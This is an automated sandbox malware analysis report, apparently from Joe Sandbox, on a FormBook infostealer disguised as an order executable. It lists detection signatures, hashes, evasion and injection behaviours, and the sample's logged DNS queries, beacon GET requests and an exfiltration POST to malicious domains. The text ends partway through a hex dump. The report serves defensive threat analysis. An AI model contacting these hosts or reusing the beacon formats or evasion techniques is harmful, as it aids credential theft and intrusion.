Windows Analysis Report
spec 4008670601 AZTEK Order.exe

Overview

General Information

Sample name:	spec 4008670601 AZTEK Order.exe
Analysis ID:	1467079
MD5:	f07575dcccaa8b88972464b50b63b017
SHA1:	7949418fc5d9d6fd76c1d0349fc8dce96d777e1d
SHA256:	6ce9c6e014f84badeec8435e6e781fbde6946dc45b627aff3a307e4dee1f0934
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://www.architect-usschool.com/s24g/	Avira URL Cloud: Label: malware
Source: http://www.architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=	Avira URL Cloud: Label: malware
Source: http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD	Avira URL Cloud: Label: malware
Source: http://yg08.gowi0i.xyz	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: spec 4008670601 AZTEK Order.exe

ReversingLabs: Detection: 23%

Yara detected FormBook

Source: Yara match	File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: spec 4008670601 AZTEK Order.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: spec 4008670601 AZTEK Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: spec 4008670601 AZTEK Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: compact.pdbGCTL source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OFEkXEMCZC.exe, 0000000A.00000000.2448002882.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp, OFEkXEMCZC.exe, 0000000E.00000000.2595889432.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: QgGC.pdbSHA256 source: spec 4008670601 AZTEK Order.exe
Source:	Binary string: wntdll.pdb source: spec 4008670601 AZTEK Order.exe, spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: compact.pdb source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: QgGC.pdb source: spec 4008670601 AZTEK Order.exe

Source: C:\Windows\SysWOW64\compact.exe

Code function: 12_2_02DDC170 FindFirstFileW,FindNextFileW,FindClose,

12_2_02DDC170

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\compact.exe	Code function: 4x nop then xor eax, eax		12_2_02DC96F0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 4x nop then mov ebx, 00000004h		12_2_03A2053F

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.hellokong.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 64.190.62.22 64.190.62.22
Source: Joe Sandbox View	IP Address: 203.161.49.220 203.161.49.220

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /jmiz/?Bp=2LpD8tLh&7Dihs8p=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fondazionegtech.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /92z0/?7Dihs8p=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Bp=2LpD8tLh HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.mengistiebethlehem.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /oc7s/?Bp=2LpD8tLh&7Dihs8p=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ad14.funUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Bp=2LpD8tLh HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.epicbazaarhub.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /wvam/?Bp=2LpD8tLh&7Dihs8p=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rz6grmvv.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /oui5/?7Dihs8p=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Bp=2LpD8tLh HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hellokong.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.architect-usschool.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /3jr0/?7Dihs8p=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Bp=2LpD8tLh HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.easybackpage.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.superunicornpalace.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /rxdf/?7Dihs8p=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Bp=2LpD8tLh HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tedjp-x.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.3cubesinterior.inUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /s0j2/?7Dihs8p=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Bp=2LpD8tLh HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.artvectorcraft.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /pv57/?7Dihs8p=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Bp=2LpD8tLh HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hondamechanic.todayUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Source: global traffic	DNS traffic detected: DNS query: www.fondazionegtech.org
Source: global traffic	DNS traffic detected: DNS query: www.mengistiebethlehem.com
Source: global traffic	DNS traffic detected: DNS query: www.ad14.fun
Source: global traffic	DNS traffic detected: DNS query: www.epicbazaarhub.com
Source: global traffic	DNS traffic detected: DNS query: www.rz6grmvv.shop
Source: global traffic	DNS traffic detected: DNS query: www.hellokong.xyz
Source: global traffic	DNS traffic detected: DNS query: www.architect-usschool.com
Source: global traffic	DNS traffic detected: DNS query: www.easybackpage.net
Source: global traffic	DNS traffic detected: DNS query: www.superunicornpalace.com
Source: global traffic	DNS traffic detected: DNS query: www.tedjp-x.com
Source: global traffic	DNS traffic detected: DNS query: www.3cubesinterior.in
Source: global traffic	DNS traffic detected: DNS query: www.artvectorcraft.store
Source: global traffic	DNS traffic detected: DNS query: www.macklaer.com
Source: global traffic	DNS traffic detected: DNS query: www.hondamechanic.today

Source: unknown

HTTP traffic detected: POST /92z0/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 212Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.mengistiebethlehem.comOrigin: http://www.mengistiebethlehem.comReferer: http://www.mengistiebethlehem.com/92z0/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoData Raw: 37 44 69 68 73 38 70 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 7a 6a 68 30 51 6d 2f 39 39 4d 72 45 4a 50 50 7a 71 78 44 4b 30 31 43 64 70 62 77 42 4f 6a 65 6f 58 56 74 76 31 6d 52 76 69 75 63 6d 2f 4e 7a 39 63 65 78 42 31 4f 79 54 54 58 6b 57 4d 53 64 62 39 56 37 41 75 78 49 44 59 4b 6b 2b 37 2f 4c 6b 33 6f 61 6a 63 31 69 2f 34 38 67 32 2b 31 47 53 41 2f 4d 6e 7a 6c 54 44 46 6d 73 76 6a 32 71 4a 4b 73 6d 42 55 47 49 4c 38 76 55 64 47 53 39 55 66 68 32 69 37 39 54 70 45 31 32 34 42 58 65 75 61 57 32 4b 51 78 69 41 54 5a 31 30 2f 44 71 73 6d 32 43 63 6f 75 64 57 52 63 31 71 47 45 37 66 4f 69 6b 43 42 6a 74 78 54 4b 63 73 33 38 52 73 Data Ascii: 7Dihs8p=LeJA0Aalyl7fzjh0Qm/99MrEJPPzqxDK01CdpbwBOjeoXVtv1mRviucm/Nz9cexB1OyTTXkWMSdb9V7AuxIDYKk+7/Lk3oajc1i/48g2+1GSA/MnzlTDFmsvj2qJKsmBUGIL8vUdGS9Ufh2i79TpE124BXeuaW2KQxiATZ10/Dqsm2CcoudWRc1qGE7fOikCBjtxTKcs38Rs

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:51:46 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:51:49 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 c7 e1 59 fb 8b 4f c8 2f 09 37 64 cc 05 10 7c b3 dc 2a 1a 83 04 8d 7d 23 f2 45 fb ec 93 71 2e 43 b7 d6 3a 6f ca c6 7c c2 34 51 4d d3 84 e1 32 4e c2 3a 34 e6 56 cf 8a 3b 3b 9a 9b 3c cb 94 b6 bf 80 b1 c6 87 a6 e5 29 7e b1 34 f3 eb 12 a6 e4 5b 04 6e b4 26 4c e4 f0 d3 b8 de 78 1c 1a 30 06 61 de 5b a5 51 ac 96 01 fb 03 8e 5c 57 cd ff f5 fe a7 7f 6d 19 ab 71 75 7c 3c ab db 46 e3 11 d5 08 13 d7 ee f1 71 d5 3e ab 63 0f 47 0d 5a 21 8e aa ff 02 a1 ad 7b 4d af 89 67 26 27 0c 97 c1 23 9b ac 8f 09 f0 38 b1 0d 0c e0 d4 e2 17 5c 66 dd 62 ba d7 18 96 03 38 96 7f e5 d2 f6 ba 5f 69 cd 66 75 68 c5 c8 c9 6d 12 b9 b3 53 a0 5b 11 26 36 9a 7a 54 7f 05 27 59 70 6a be 15 9b c6 50 83 cd b5 24 b6 05 68 82 59 7d b5 57 94 af 31 5f 5c c2 68 34 d2 bf da df 1f 1b 6b 81 f3 a5 c0 66 ca 9d fc 98 1d a2 a3 6a 63 c1 e2 9a bf 28 74 30 b5 df f2 e8 aa 17 e2 73 3c ee fd 96 8f c1 1b ff 96 77 3d 2f c2 e7 05 bb 2c 23 b5 83 69 c1 56 5a e3 0f 9f 74 fc 4f b6 61 a3 31 db f8 ee Data Ascii: 65SSJe]ol\ "qX(*[
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:51:52 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 